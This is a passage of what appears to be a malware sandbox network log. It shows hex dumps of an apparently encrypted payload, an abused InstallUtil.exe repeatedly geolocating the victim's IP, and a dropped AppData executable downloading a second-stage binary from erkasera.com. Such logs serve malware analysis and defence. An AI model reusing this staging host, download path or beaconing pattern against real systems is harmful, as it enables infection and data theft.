\|{P,Gma}!?65'_f"#}I4]M,%>"E:z!P!Kwv4)_?P7e\G!:.GU?gG$$LEg1Fps#g
2024-10-28 18:04:09 UTC	16384	IN	Data Raw: 9a bd d9 ff f4 5c 55 df 74 7e f1 3c 89 22 58 43 a7 a0 dd e3 fd df 15 4e 68 2e 06 04 64 7b 13 be d9 86 b2 b6 77 90 8a 6c 36 00 1a f9 0b 1f b0 a2 4a 51 b9 2c 89 3e 6e e2 1a 9d 1e b9 40 0a 13 d1 dc e3 94 91 d9 ce 94 8b f8 de 45 8f 78 95 dc d7 d6 7e 1b b5 d6 0f 89 9d ec 40 0d d3 a6 52 77 e2 0b e7 98 a8 4a 15 12 32 9c 2d 4d df 5a 5e 47 2c 82 77 56 f8 3c 5f 21 a0 01 ef 12 1b 4b 1b 6e 82 5f 64 03 d0 90 15 d0 b7 92 04 76 c0 85 fb 1f 8f ca 44 18 5d 87 e4 e0 2c 64 d7 de 41 bd 4f 58 50 b9 62 fe 62 3a 2b 7f 33 8c 99 3d 42 32 d4 45 15 91 28 98 18 33 88 3c 25 cb 82 d7 d9 ed f8 9f 09 56 29 9c 88 f7 2f 28 0f c7 cf a8 87 fb 5f 17 c7 e5 d2 92 14 37 22 8e ef 40 17 08 8d c8 06 c9 bb 80 e9 e2 b1 3b 20 f5 9c 5b 7c dd 82 ac bb a8 d8 d0 f7 9c fa 3c fa 04 f1 81 c4 0a a2 d6 9c f9 Data Ascii: \Ut~<"XCNh.d{wl6JQ,>n@Ex~@RwJ2-MZ^G,wV<_!Kn_dvD],dAOXPbb:+3=B2E(3<%V)/(_7"@; [\|<
2024-10-28 18:04:09 UTC	16384	IN	Data Raw: 0a bb 49 5c 25 40 37 cf 37 ee c2 16 df e0 fe ab 4e 04 61 2e b6 3c bc c6 17 db 75 80 83 fa 72 48 4f ee f7 b9 69 c1 e6 9f e2 40 46 d9 fc 98 68 d6 81 44 58 25 51 cf f3 f0 2d db 5e 33 fe b3 48 29 4f 44 c8 94 6b 98 50 67 f6 0f 9c 50 6d 98 48 95 16 84 71 df a9 b8 2c 5e ef 57 f3 88 cd 2f 7f 39 09 fc 1e ce 89 2e 8d 93 fc 76 c1 fa 76 5e f2 3e 12 3e 1b 2c e3 f7 19 da 44 1f cf 4c d8 64 f8 ee ad 35 ed 59 d5 92 a9 b9 c5 5c 45 a1 77 32 fb b5 80 7d ae cc db ed 01 78 f2 2b 40 df 96 9a 0e ac 48 e9 bf d7 d5 d6 11 f3 23 db b9 9e d2 a6 99 e1 19 bb d6 b2 38 d2 26 71 99 38 cb da 24 6c f4 c0 3e 70 71 84 2f 7e 74 f0 d8 89 c6 7e 78 cb 8d c2 5b c2 d0 51 33 86 29 f7 68 cd 10 9f 7d 1f c4 f7 23 fa a4 82 61 47 63 a8 1b 8f 2d da 17 fb 9a 1a ba 90 81 73 ed a4 d5 94 d2 ca 59 f7 77 b1 d9 Data Ascii: I\%@77Na.<urHOi@FhDX%Q-^3H)ODkPgPmHq,^W/9.vv^>>,DLd5Y\Ew2}x+@H#8&q8$l>pq/~t~x[Q3)h}#aGc-sYw
2024-10-28 18:04:09 UTC	16384	IN	Data Raw: 9f b5 d1 fc e5 04 cf 4b 1d 85 7a 3b 74 1e bf 0f 47 6f e9 dc 86 0a a7 75 e3 dd 78 d8 e1 97 91 58 11 4a 26 2d af e2 58 34 4f 76 5d c0 f4 51 f8 bf eb 35 06 b4 6e 4c 20 1a e8 0d 18 9c 2d ae 3f 4e c6 9e 80 5a 20 0b 6a 64 19 96 64 e8 df 42 3c ec d0 88 44 28 51 6f 03 d7 d4 02 49 b7 c1 6a 46 8f cc fd dc 8f a1 a5 53 84 ab 8e 7c aa c4 cf b3 a6 6e 3e a7 fc 3c 0e 9f d2 6e fd 24 42 7f 01 39 05 25 ee f5 ac 25 e1 aa 36 0f c5 85 db 95 d5 39 f0 4d 59 81 eb 96 ea 09 37 38 ab 54 06 4f 5a 1f cb f5 df 5d da 65 d6 18 27 09 9d 92 c1 1b 71 6f 79 d1 cb 74 74 ed 87 0a d7 c7 60 66 63 12 e1 f3 a7 cd 6a 99 2e eb ec 67 e8 6d e9 ab 6a f8 fa 2a d3 3a 9d 7b 9b e6 34 29 ad de c1 37 55 d8 84 66 d0 97 a1 cd 13 e4 bb 49 24 20 b3 11 ca 51 df 80 1d a9 a9 d4 b0 32 fe 5c 63 ab 81 40 49 4e cd a3 Data Ascii: Kz;tGouxXJ&-X4Ov]Q5nL -?NZ jddB<D(QoIjFS\|n><n$B9%%69MY78TOZ]e'qoytt`fcj.gmj*:{4)7UfI$ Q2\c@IN
2024-10-28 18:04:09 UTC	16384	IN	Data Raw: 3f 0b d7 d7 60 33 05 d7 5f 5b 14 61 16 81 02 c3 f5 77 c4 c4 1a 03 5e 22 a6 29 25 aa 15 ac 9d ed 12 ff b9 2a 8b 77 9d 61 6d c9 d6 63 2a 46 f6 08 71 68 be 3c fd 06 b0 24 31 c8 36 81 b5 a4 75 13 37 dc a2 10 5c 41 b6 cd f5 1d 01 32 47 21 a2 ae 02 e5 cd 26 92 9f c5 95 ee 7e 32 82 ca 51 8e fe 5e 89 63 96 77 6a 52 91 29 67 16 bd ed ee 5d 18 1e 9a 88 4c b4 76 4e d4 9c cf db 8e fb be 82 2d 40 af fa 55 9d b8 30 9d 06 0e 1b 59 0c d5 af 9f a2 93 76 c4 a1 03 22 10 ef d4 36 58 91 7b 29 17 c5 8b 58 6f 01 7f f6 10 34 65 7b ad e4 19 a7 19 2e ca 1f 88 fe f6 28 20 9d 11 1d 83 5c df e2 63 3d 96 0d 8f c0 d1 8f f6 ab e0 36 08 e7 4c a6 fe 91 36 70 84 04 e5 59 01 24 22 7b 25 80 93 25 33 31 f6 35 be a1 6f 1e cf 82 5c 8b e7 f0 ff 70 10 81 22 6c e7 c3 24 61 58 28 e7 ca 14 8c e2 56 Data Ascii: ?`3_[aw^")%wamcFqh<$16u7\A2G!&~2Q^cwjR)g]LvN-@U0Yv"6X{)Xo4e{.( \c=6L6pY$"{%%315o\p"l$aX(V
2024-10-28 18:04:09 UTC	16384	IN	Data Raw: d7 7d f6 7c 4c 1f ec 8f 7b 19 00 61 a4 4d 7a f0 bd 9b 50 20 75 32 06 63 22 d1 90 c4 a5 4a 50 9c 10 b8 95 42 56 dc f7 25 4b c7 22 00 fe 85 b4 3d d2 1c c7 f6 48 7b 84 1d 82 1b 20 3c 83 52 d2 42 f7 45 2e e6 48 f3 e1 fe 7b 09 85 34 c1 a4 bf 47 e9 fa cf a6 b0 91 5d 7f 96 7d 20 01 d2 18 a0 92 ea 4c 62 45 e9 04 73 54 f1 cd 64 9d bd 7b a1 13 1d 98 38 60 49 0e 83 c2 71 db c3 ed 75 b6 bf 66 30 e6 08 c8 37 3d eb e8 1d 00 6a 1c 0c c2 bb da f6 fc 73 59 4e c6 d7 fb 75 8e e1 4a 87 d0 ad 2a 25 d1 df 0e 72 47 bc b7 6d 07 9b 9b 71 1e 0f e1 7a 9e e1 db 4a 18 21 f8 f8 c6 48 48 22 75 67 07 e2 b0 51 5b e9 19 44 75 f7 de fd bc 8c 06 ab 24 67 65 cf ee cc 65 27 26 15 22 b2 cb c1 3c 1c cd 70 c4 a6 6b 4d a4 c5 4d 99 c3 ca 0a 5a 1a 8c 92 fb 68 bc 94 db 34 7b 17 ff 67 66 d0 38 b4 df Data Ascii: }\|L{aMzP u2c"JPBV%K"=H{ <RBE.H{4G]} LbEsTd{8`Iquf07=jsYNuJ*%rGmqzJ!HH"ugQ[Du$gee'&"<pkMMZh4{gf8
2024-10-28 18:04:10 UTC	16384	IN	Data Raw: 44 fb ad 0c 66 e1 5f 99 43 3b d8 ec 0d d1 07 18 8e d6 72 69 36 72 55 13 59 05 e1 01 5b c4 ed 71 19 c7 0b 7a ab 6f 09 45 be 85 58 28 00 eb a2 23 9e d9 3f e9 e9 f8 1a 27 d0 28 65 e4 2b fd 1f 4c 26 4d 6b b5 1e 01 ac 85 ae 28 68 a5 f4 dd 65 8e 61 51 f3 7c 22 9b 18 23 8d fb 36 a6 01 40 7d 81 11 37 e7 5c 43 b8 f9 ce de ce da aa 5f 2a f8 c5 6e 7a 39 2b 09 d0 fc 88 f0 51 f4 21 35 4a 69 ef 2c 27 1a 83 ac f9 3e 10 f8 0a fc 7c db e1 dc 7a e0 af b6 3f 94 68 82 be 00 9d ca f2 9a fe 61 f5 f6 04 3e 85 b0 c4 28 36 18 5c 00 24 cc 21 f0 e2 21 c0 65 e5 cd 45 4c 31 71 a2 00 43 8e f9 06 44 d7 88 a1 0b b2 bb 65 34 56 31 ef e2 e3 24 91 a3 63 83 57 1e 69 a8 40 51 2c 4d 86 52 a8 80 e6 3c 2e 65 4d 37 69 5b 86 b4 7c 26 ff 49 c2 60 34 0d 07 af 41 03 f7 f5 0b 9e 35 17 03 86 87 47 23 Data Ascii: Df_C;ri6rUY[qzoEX(#?'(e+L&Mk(heaQ\|"#6@}7\C_*nz9+Q!5Ji,'>\|z?ha>(6\$!!eEL1qCDe4V1$cWi@Q,MR<.eM7i[\|&I`4A5G#
2024-10-28 18:04:10 UTC	16384	IN	Data Raw: b4 ee 08 5d d6 6e d8 e9 dd 73 13 37 54 e8 e8 f8 e3 96 56 60 a7 23 e3 fa 80 b0 1f 72 62 59 30 97 e0 d2 22 c2 0d ed 18 a0 f9 63 6c 53 c6 e7 b9 f8 82 53 23 7f 17 41 44 d8 a1 5d 22 e8 5c 97 d5 7a 7f c5 89 34 c2 45 d5 4d c6 da 1e 82 db 73 47 c2 b5 6a 67 13 2f 0d 0e 49 3e 38 f4 ee 2b be 09 94 2e e9 a9 ea 0b 68 1a 5f c7 c7 51 60 fd 86 52 ab 49 68 42 98 81 77 ea 3a bb b8 6d 11 81 b6 a3 93 9b 1f 57 e5 13 92 69 6b 23 e4 22 32 b4 54 6f 70 6e 11 30 07 18 7e 78 fb 1c 61 df c3 92 e8 87 86 5c 03 82 4a 60 52 28 7b d8 41 0e 61 20 02 70 34 5e c3 9d fd c7 a9 d1 89 07 66 61 8d 90 15 64 28 ad 00 d3 7d cb 91 4f c9 9f 4f 31 18 b4 0a d6 5f ab 76 ef ed ff 8c 7f 6f ae 7e a0 ee 12 bb d0 2b 99 f2 51 f5 86 db 99 29 dd 95 7d f9 b2 0e 04 7c 1d 87 e4 cc 97 6c 08 4b 82 30 ae db 7d a3 25 Data Ascii: ]ns7TV`#rbY0"clSS#AD]"\z4EMsGjg/I>8+.h_Q`RIhBw:mWik#"2Topn0~xa\J`R({Aa p4^fad(}OO1_vo~+Q)}\|lK0}%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	188.114.97.3	443	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:17 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 18:04:18 UTC	881	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:18 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVwB0hEZPHcEJng= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 55319 Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h21RbSX3kBenshGe2ygKOTtTEwOam1%2FnGy6cfzvsWzArZ%2BrHzXOEmzPPMk89rUNQhFXp7YUCmYtQdk5pVAwMXeWT53XiCOiRSzlReEvgJfyc4S0FzujGAv1l%2B5eNk4EH8QPSC4iW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd8f48871bcaa-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20195&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=143515&cwnd=32&unsent_bytes=0&cid=7189ea7a17ceb36c&ts=259&x=0"
2024-10-28 18:04:18 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	188.114.97.3	443	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:18 UTC	63	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-28 18:04:19 UTC	888	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:19 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61290 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGjg%2Bbf3BVPLRJihsT0A%2FGVfdl0uBssyPRZLAzBMC6x6oztN7%2Br%2FCMBmdqFeyfl%2F0iuEMzj7YrZJfwhNAqBT%2B1S1FgjuyrC3NP6w2MDJHDMjMnR4NqInNx20rmdt7Y9GmFAq12eJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd8fb0ea96c79-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1121&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2681481&cwnd=251&unsent_bytes=0&cid=f60315e5832f0969&ts=158&x=0"
2024-10-28 18:04:19 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	188.114.97.3	443	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:20 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 18:04:20 UTC	877	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:20 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVwB0hEZPHcEJng= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 55321 Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3q05WazEXpRWQrxD7IEAlpjmI1FaDiSkpsrCDyBiOcodLmcLV6ATDZt36QV8Hm0OvIYEDoK5j9MdjbbIM09PCX8tZLaUSg5yHdFoocs%2FQgUYdOf7rAZ2B4CvIORIUr84RuKjYS2g"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd9059a4a1365-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17581&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=165315&cwnd=32&unsent_bytes=0&cid=0ad0ce6f79b17061&ts=164&x=0"
2024-10-28 18:04:20 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49737	188.114.97.3	443	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:22 UTC	63	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-28 18:04:22 UTC	885	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:22 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVwB0hEZPHcEJng= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 55323 Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YrBCTZZmNkHS3CVYE8qrNP70FjOqgOvatUprgxlI%2FaL9xtUu4QHwxvXE52zpT%2FMPy0K5JfNV%2BzdUh6jdAJcq05J1CWnOSvrsXg%2Bcsbo2vLWQtplM%2BKTaQ80L5Ycd2IFEpBhfPavj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd9104d78bd00-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20473&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=142744&cwnd=32&unsent_bytes=0&cid=98cb9ad6b937f326&ts=184&x=0"
2024-10-28 18:04:22 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	188.114.97.3	443	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:24 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 18:04:24 UTC	882	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:24 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61295 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Wbn5lC%2Fx9oQXik9HnFoSyNj5bFqb68SGXTQqhS0A9OLI2iU8idtCoDq5zZvGEAzdq%2FB8H9yb5cBATo7UMxb%2BkSVwAjl8dew5kzmgIGxHBkwU25g3qkDKY6W5MnVOljnOV5nQMQF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd91af8d2e78a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2105&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1321167&cwnd=251&unsent_bytes=0&cid=164712fe6a82a906&ts=173&x=0"
2024-10-28 18:04:24 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	188.114.97.3	443	7452	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:25 UTC	63	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-28 18:04:25 UTC	880	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:25 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61296 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6I1nA%2Bd5pfAsIAudxe3vixDrJwK%2BaoQbXXbyRkEnTf2S6H9isLrKfkxFzMHF0Br1SeGxRpDyx2G6YElN8KvgxO7yluYTS6wyTGiZS2lclls52zzoTeYg79qbXKToiJltGkUhDb0y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd9258c24e9b5-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1952798&cwnd=251&unsent_bytes=0&cid=abcfb7026e58618b&ts=176&x=0"
2024-10-28 18:04:25 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	188.132.193.46	443	7844	C:\Users\user\AppData\Roaming\RequiredContract.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:27 UTC	82	OUT	GET /ruurew/Ktanfonto.vdf HTTP/1.1 Host: erkasera.com Connection: Keep-Alive
2024-10-28 18:04:27 UTC	207	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Mon, 28 Oct 2024 08:35:54 GMT accept-ranges: bytes content-length: 951816 date: Mon, 28 Oct 2024 18:04:08 GMT
